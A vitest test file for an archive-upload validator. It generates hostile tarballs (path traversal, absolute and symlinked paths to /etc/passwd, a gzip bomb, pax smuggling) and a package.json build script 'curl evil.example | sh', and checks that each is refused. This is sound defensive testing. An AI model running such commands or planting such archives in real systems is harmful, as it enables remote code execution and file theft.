/**
 * Source intake — the untrusted-input boundary.
 *
 * Every hostile archive here is generated by `tests/_support/tar.ts`, so what is being
 * refused is visible in the test rather than hidden in a committed binary. The
 * happy path builds its archive from `fixtures/hosted/minimal-app`, which is
 * the same tree the real build test compiles.
 */
import fs from "node:fs";
import os from "node:os";
import path from "node:path";
import zlib from "node:zlib";
import { afterAll, beforeAll, describe, expect, it } from "vitest";
import { isolatedDataDir, removeDir } from "../_fixtures";
import { entriesFromDirectory, gzip, paxRecord, writeTar, type TarEntry } from "../../_support/tar";

const DATA = isolatedDataDir("zenith-w2-source-");
const FIXTURE = path.join(process.cwd(), "fixtures", "hosted", "minimal-app");

let source: typeof import("@/lib/hosted/source");
let contracts: typeof import("@/lib/hosted/contracts");

beforeAll(async () => {
  source = await import("@/lib/hosted/source");
  contracts = await import("@/lib/hosted/contracts");
});

afterAll(() => removeDir(DATA));

const fixtureEntries = (): TarEntry[] => entriesFromDirectory(FIXTURE);

/** Run the validator and return the reasons it refused with. Fails if it accepted. */
function reasonsFor(input: { kind: "tarball"; bytes: Buffer } | { kind: "directory"; path: string }): string[] {
  try {
    source.validateSource(input);
  } catch (err) {
    if (!(err instanceof contracts.HostedError)) throw err;
    expect(err.code).toBe("unsupported_source");
    expect(err.status).toBe(422);
    expect(err.fix).toBeTruthy();
    const reasons = err.details?.reasons;
    expect(Array.isArray(reasons)).toBe(true);
    return reasons as string[];
  }
  throw new Error("expected the source to be refused, but it was accepted");
}

const reasonsForTar = (entries: TarEntry[]): string[] => reasonsFor({ kind: "tarball", bytes: writeTar(entries) });

const withoutPath = (entries: TarEntry[], drop: string): TarEntry[] => entries.filter((e) => e.path !== drop);

const replacing = (entries: TarEntry[], target: string, bytes: Buffer): TarEntry[] =>
  entries.map((e) => (e.path === target ? { ...e, bytes } : e));

describe("validateSource — the supported v1 tarball", () => {
  it("accepts the minimal-app fixture and pins a digest", () => {
    const validated = source.validateSource({ kind: "tarball", bytes: writeTar(fixtureEntries()) });
    expect(validated.kind).toBe("tarball");
    expect(validated.manifest.name).toBe("Minimal app");
    expect(validated.manifest.contract).toBe(1);
    expect(validated.digest).toMatch(/^[0-9a-f]{64}$/);
    expect(validated.totalBytes).toBeGreaterThan(0);
    expect(validated.files.map((f) => f.path)).toEqual([
      "README.md",
      "index.html",
      "package.json",
      "public/favicon.svg",
      "src/main.tsx",
      "src/styles.css",
      "zenith.app.json",
    ]);
  });

  it("accepts the same archive gzipped, with the same digest", () => {
    const plain = source.validateSource({ kind: "tarball", bytes: writeTar(fixtureEntries()) });
    const zipped = source.validateSource({ kind: "tarball", bytes: gzip(writeTar(fixtureEntries())) });
    expect(zipped.digest).toBe(plain.digest);
  });

  it("gives the same digest whatever order the entries arrive in", () => {
    const forward = source.validateSource({ kind: "tarball", bytes: writeTar(fixtureEntries()) });
    const reversed = source.validateSource({ kind: "tarball", bytes: writeTar([...fixtureEntries()].reverse()) });
    expect(reversed.digest).toBe(forward.digest);
  });

  it("gives a different digest when one byte of content changes", () => {
    const before = source.validateSource({ kind: "tarball", bytes: writeTar(fixtureEntries()) });
    const after = source.validateSource({
      kind: "tarball",
      bytes: writeTar(replacing(fixtureEntries(), "src/styles.css", Buffer.from("body { margin: 1px; }\n"))),
    });
    expect(after.digest).not.toBe(before.digest);
  });

  it("reads a ustar prefix + name pair as one path", () => {
    const entries = fixtureEntries().map((e) =>
      e.path === "src/main.tsx" ? { ...e, path: "main.tsx", prefix: "src" } : e
    );
    const validated = source.validateSource({ kind: "tarball", bytes: writeTar(entries) });
    expect(validated.files.some((f) => f.path === "src/main.tsx")).toBe(true);
  });

  it("reads a GNU long-name entry", () => {
    const long = `src/${"a".repeat(96)}.tsx`;
    const entries: TarEntry[] = [
      ...fixtureEntries(),
      { path: "././@LongLink", type: "gnuLongName", bytes: Buffer.from(`${long}${String.fromCharCode(0)}`) },
      { path: "src/truncated-name.tsx", bytes: Buffer.from("export const x = 1;\n") },
    ];
    const validated = source.validateSource({ kind: "tarball", bytes: writeTar(entries) });
    expect(validated.files.some((f) => f.path === long)).toBe(true);
  });
});

describe("validateSource — the directory intake mirrors the tarball", () => {
  it("produces the same digest from the fixture directory", () => {
    const fromTar = source.validateSource({ kind: "tarball", bytes: writeTar(fixtureEntries()) });
    const fromDir = source.validateSource({ kind: "directory", path: FIXTURE });
    expect(fromDir.kind).toBe("directory");
    expect(fromDir.digest).toBe(fromTar.digest);
  });

  it("refuses a symbolic link instead of following it", () => {
    const dir = fs.mkdtempSync(path.join(fs.realpathSync(os.tmpdir()), "zenith-w2-link-"));
    try {
      fs.cpSync(FIXTURE, dir, { recursive: true });
      let linked = false;
      try {
        fs.symlinkSync(path.join(dir, "index.html"), path.join(dir, "src", "linked.tsx"), "file");
        linked = true;
      } catch {
        // Windows without developer mode refuses symlink creation; the junction
        // below exercises the same lstat branch for a directory.
        try {
          fs.symlinkSync(path.join(dir, "public"), path.join(dir, "src", "linked"), "junction");
          linked = true;
        } catch {
          linked = false;
        }
      }
      if (!linked) return; // nothing this host can create; the tar path covers the same refusal
      const reasons = reasonsFor({ kind: "directory", path: dir });
      expect(reasons.some((r) => /linked/.test(r) && /link is not accepted/.test(r))).toBe(true);
    } finally {
      removeDir(dir);
    }
  });

  it("refuses a path that is not a directory", () => {
    const reasons = reasonsFor({ kind: "directory", path: path.join(FIXTURE, "index.html") });
    expect(reasons.some((r) => r.includes("not a readable directory"))).toBe(true);
  });
});

describe("validateSource — path and archive shapes", () => {
  it("refuses a ..-traversal entry", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "../x.tsx", bytes: Buffer.from("x") }]);
    expect(reasons.some((r) => r.includes('".." segment'))).toBe(true);
  });

  it("refuses an absolute entry", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "/etc/passwd", bytes: Buffer.from("x") }]);
    expect(reasons.some((r) => r.includes("absolute path is not accepted"))).toBe(true);
  });

  it("refuses a drive-letter entry", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "C:/Windows/system.ini", bytes: Buffer.from("x") }]);
    expect(reasons.some((r) => r.includes("absolute path is not accepted"))).toBe(true);
  });

  it("refuses a backslash entry", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "src\\evil.tsx", bytes: Buffer.from("x") }]);
    expect(reasons.some((r) => r.includes("may not contain a backslash"))).toBe(true);
  });

  it("refuses a symlink entry", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "src/link.tsx", type: "symlink", linkname: "/etc/passwd" },
    ]);
    expect(reasons.some((r) => r.includes("symbolic link is not accepted"))).toBe(true);
  });

  it("refuses a hard link entry", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "src/hard.tsx", type: "hardlink", linkname: "index.html" },
    ]);
    expect(reasons.some((r) => r.includes("hard link is not accepted"))).toBe(true);
  });

  it("refuses device and FIFO entries", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "src/dev", type: "chardev" },
      { path: "src/pipe", type: "fifo" },
    ]);
    expect(reasons.filter((r) => r.includes("device, FIFO and contiguous")).length).toBe(2);
  });

  it("refuses a tree deeper than the limit", () => {
    const deep = `src/${Array.from({ length: contracts.SOURCE_LIMITS.maxDepth }, (_, i) => `d${i}`).join("/")}/x.tsx`;
    const reasons = reasonsForTar([...fixtureEntries(), { path: deep, bytes: Buffer.from("x") }]);
    expect(reasons.some((r) => r.includes("levels deep"))).toBe(true);
  });

  it("refuses a path longer than the limit, however the archive carries it", () => {
    // The ustar `name` field is 100 bytes, so an over-long path can only reach
    // the reader through a pax `path` record — which is exactly the smuggling
    // route worth checking.
    const long = `src/${"n".repeat(contracts.SOURCE_LIMITS.maxPathLength)}.tsx`;
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "PaxHeader", type: "pax", bytes: paxRecord("path", long) },
      { path: "src/short.tsx", bytes: Buffer.from("x") },
    ]);
    expect(reasons.some((r) => r.includes("characters; the limit is"))).toBe(true);
  });

  it("refuses a single file over the per-file limit", () => {
    const big = Buffer.alloc(contracts.SOURCE_LIMITS.maxFileBytes + 1, 0x61);
    const reasons = reasonsForTar([...fixtureEntries(), { path: "public/big.txt", bytes: big }]);
    expect(reasons.some((r) => r.includes("the per-file limit is"))).toBe(true);
  });

  it("refuses a tree over the total byte limit", () => {
    const chunk = Buffer.alloc(1_900_000, 0x62);
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "public/a.txt", bytes: chunk },
      { path: "public/b.txt", bytes: chunk },
      { path: "public/c.txt", bytes: chunk },
    ]);
    expect(reasons.some((r) => r.includes("larger than"))).toBe(true);
  });

  it("refuses more files than the limit", () => {
    const many: TarEntry[] = Array.from({ length: contracts.SOURCE_LIMITS.maxFiles + 1 }, (_, i) => ({
      path: `src/f${i}.tsx`,
      bytes: Buffer.from("x"),
    }));
    const reasons = reasonsForTar([...fixtureEntries(), ...many]);
    expect(reasons.some((r) => r.includes("more than"))).toBe(true);
  });

  it("refuses a gzip bomb by the decompression ceiling, not by expanding it", () => {
    const bomb = zlib.gzipSync(Buffer.alloc(contracts.SOURCE_LIMITS.maxDecompressedBytes + 4096, 0));
    expect(bomb.length).toBeLessThan(200_000);
    const reasons = reasonsFor({ kind: "tarball", bytes: bomb });
    expect(reasons.some((r) => r.includes("decompression ceiling"))).toBe(true);
  });

  it("refuses a truncated archive", () => {
    const whole = writeTar(fixtureEntries());
    const reasons = reasonsFor({ kind: "tarball", bytes: whole.subarray(0, whole.length - 3 * 512) });
    expect(reasons.some((r) => r.includes("truncated"))).toBe(true);
  });

  it("refuses a size field larger than the payload", () => {
    const reasons = reasonsForTar([
      { path: "index.html", bytes: Buffer.from("<html></html>"), declaredSize: 5_000_000 },
    ]);
    expect(reasons.some((r) => r.includes("truncated"))).toBe(true);
  });

  it("refuses a corrupt header checksum", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "src/bad.tsx", bytes: Buffer.from("x"), corruptChecksum: true },
    ]);
    expect(reasons.some((r) => r.includes("failed its checksum"))).toBe(true);
  });

  it("refuses a pax record it does not model", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "PaxHeader", type: "pax", bytes: paxRecord("SCHILY.xattr.security.selinux", "unconfined") },
      { path: "src/x.tsx", bytes: Buffer.from("x") },
    ]);
    expect(reasons.some((r) => r.includes("does not model"))).toBe(true);
  });

  it("refuses a pax global header", () => {
    const reasons = reasonsForTar([
      { path: "pax_global_header", type: "paxGlobal", bytes: paxRecord("comment", "hello") },
      ...fixtureEntries(),
    ]);
    expect(reasons.some((r) => r.includes("pax global header"))).toBe(true);
  });

  it("refuses the same path twice", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "index.html", bytes: Buffer.from("<b>second</b>") }]);
    expect(reasons.some((r) => r.includes("holds this path twice"))).toBe(true);
  });

  it("refuses an empty upload", () => {
    const reasons = reasonsFor({ kind: "tarball", bytes: Buffer.alloc(0) });
    expect(reasons.some((r) => r.includes("upload is empty"))).toBe(true);
  });
});

describe("validateSource — the source contract", () => {
  it("refuses a submitted vite config", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "vite.config.ts", bytes: Buffer.from("export default {}") }]);
    expect(reasons.some((r) => r.includes("vite.config.ts"))).toBe(true);
  });

  it("refuses any other config module", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "src/tailwind.config.js", bytes: Buffer.from("module.exports = {}") },
    ]);
    expect(reasons.some((r) => r.includes("tailwind.config.js"))).toBe(true);
  });

  it("refuses a .env file", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: ".env", bytes: Buffer.from("SECRET=1") }]);
    expect(reasons.some((r) => r.includes(".env"))).toBe(true);
  });

  it("refuses a lockfile", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "package-lock.json", bytes: Buffer.from("{}") },
    ]);
    expect(reasons.some((r) => r.includes("package-lock.json"))).toBe(true);
  });

  it("refuses node_modules", () => {
    const reasons = reasonsForTar([
      ...fixtureEntries(),
      { path: "node_modules/", type: "dir" },
      { path: "node_modules/left-pad/index.js", bytes: Buffer.from("module.exports = 1") },
    ]);
    expect(reasons.some((r) => r.includes("node_modules"))).toBe(true);
  });

  it("refuses a tsconfig", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "tsconfig.json", bytes: Buffer.from("{}") }]);
    expect(reasons.some((r) => r.includes("tsconfig.json"))).toBe(true);
  });

  it("refuses any other dotfile", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "src/.npmrc", bytes: Buffer.from("registry=x") }]);
    expect(reasons.some((r) => r.includes(".npmrc"))).toBe(true);
  });

  it("refuses an unsupported root file", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "Makefile", bytes: Buffer.from("all:") }]);
    expect(reasons.some((r) => r.includes("may sit at the source root"))).toBe(true);
  });

  it("refuses an unsupported root directory", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "server/index.ts", bytes: Buffer.from("x") }]);
    expect(reasons.some((r) => r.includes("not a supported root directory"))).toBe(true);
  });

  it("refuses an unsupported extension under src/", () => {
    const reasons = reasonsForTar([...fixtureEntries(), { path: "src/build.sh", bytes: Buffer.from("#!/bin/sh") }]);
    expect(reasons.some((r) => r.includes("extension is not supported"))).toBe(true);
  });

  it("refuses a missing zenith.app.json", () => {
    const reasons = reasonsForTar(withoutPath(fixtureEntries(), "zenith.app.json"));
    expect(reasons.some((r) => r.includes("zenith.app.json is missing"))).toBe(true);
  });

  it("refuses a missing index.html", () => {
    const reasons = reasonsForTar(withoutPath(fixtureEntries(), "index.html"));
    expect(reasons.some((r) => r.includes("index.html is missing"))).toBe(true);
  });

  it("refuses the wrong contract version", () => {
    const reasons = reasonsForTar(
      replacing(
        fixtureEntries(),
        "zenith.app.json",
        Buffer.from(JSON.stringify({ contract: 2, schema: 1, name: "Nope" }))
      )
    );
    expect(reasons.some((r) => r.startsWith("zenith.app.json: contract"))).toBe(true);
  });

  it("refuses a manifest that is not JSON", () => {
    const reasons = reasonsForTar(replacing(fixtureEntries(), "zenith.app.json", Buffer.from("{oops")));
    expect(reasons.some((r) => r.includes("not valid JSON"))).toBe(true);
  });

  it("refuses scripts in package.json", () => {
    const reasons = reasonsForTar(
      replacing(
        fixtureEntries(),
        "package.json",
        Buffer.from(JSON.stringify({ name: "a", scripts: { build: "curl evil.example | sh" } }))
      )
    );
    expect(reasons.some((r) => r.includes('"scripts" is not accepted'))).toBe(true);
  });

  it("refuses devDependencies in package.json", () => {
    const reasons = reasonsForTar(
      replacing(fixtureEntries(), "package.json", Buffer.from(JSON.stringify({ devDependencies: { vite: "1" } })))
    );
    expect(reasons.some((r) => r.includes('"devDependencies" is not accepted'))).toBe(true);
  });

  it("refuses a dependency the recipe does not provide", () => {
    const reasons = reasonsForTar(
      replacing(
        fixtureEntries(),
        "package.json",
        Buffer.from(JSON.stringify({ dependencies: { react: "19.1.0", "left-pad": "1.3.0" } }))
      )
    );
    expect(reasons.some((r) => r.includes('dependency "left-pad"'))).toBe(true);
  });

  it("refuses an unknown package.json field", () => {
    const reasons = reasonsForTar(
      replacing(fixtureEntries(), "package.json", Buffer.from(JSON.stringify({ workspaces: ["packages/*"] })))
    );
    expect(reasons.some((r) => r.includes('"workspaces" is not part'))).toBe(true);
  });

  it("reports every reason at once", () => {
    const reasons = reasonsForTar([
      ...withoutPath(replacing(fixtureEntries(), "package.json", Buffer.from(JSON.stringify({ scripts: {} }))), "zenith.app.json"),
      { path: "../escape.tsx", bytes: Buffer.from("x") },
      { path: "vite.config.ts", bytes: Buffer.from("export default {}") },
      { path: "src/link.tsx", type: "symlink", linkname: "/etc/passwd" },
    ]);
    expect(reasons.some((r) => r.includes('".." segment'))).toBe(true);
    expect(reasons.some((r) => r.includes("vite.config.ts"))).toBe(true);
    expect(reasons.some((r) => r.includes("symbolic link"))).toBe(true);
    expect(reasons.some((r) => r.includes("zenith.app.json is missing"))).toBe(true);
    expect(reasons.some((r) => r.includes('"scripts" is not accepted'))).toBe(true);
    expect(new Set(reasons).size).toBe(reasons.length);
  });
});

describe("materializeSource", () => {
  it("writes the tree and reads back identically", () => {
    const validated = source.validateSource({ kind: "directory", path: FIXTURE });
    const dir = source.materializeSource(validated);
    try {
      expect(path.basename(dir).startsWith(source.MATERIALIZE_PREFIX)).toBe(true);
      for (const file of validated.files) {
        const onDisk = fs.readFileSync(path.join(dir, ...file.path.split("/")));
        expect(onDisk.equals(file.bytes)).toBe(true);
      }
      const again = source.validateSource({ kind: "directory", path: dir });
      expect(again.digest).toBe(validated.digest);
    } finally {
      source.removeMaterialized(dir);
    }
    expect(fs.existsSync(dir)).toBe(false);
  });

  it("re-validates paths and refuses to write outside the root", () => {
    const validated = source.validateSource({ kind: "directory", path: FIXTURE });
    const tampered = {
      ...validated,
      files: [...validated.files, { path: "../escaped.txt", bytes: Buffer.from("no") }],
    };
    expect(() => source.materializeSource(tampered)).toThrow(contracts.HostedError);
  });

  it("is idempotent about removal", () => {
    const validated = source.validateSource({ kind: "directory", path: FIXTURE });
    const dir = source.materializeSource(validated);
    source.removeMaterialized(dir);
    source.removeMaterialized(dir);
    expect(fs.existsSync(dir)).toBe(false);
  });
});
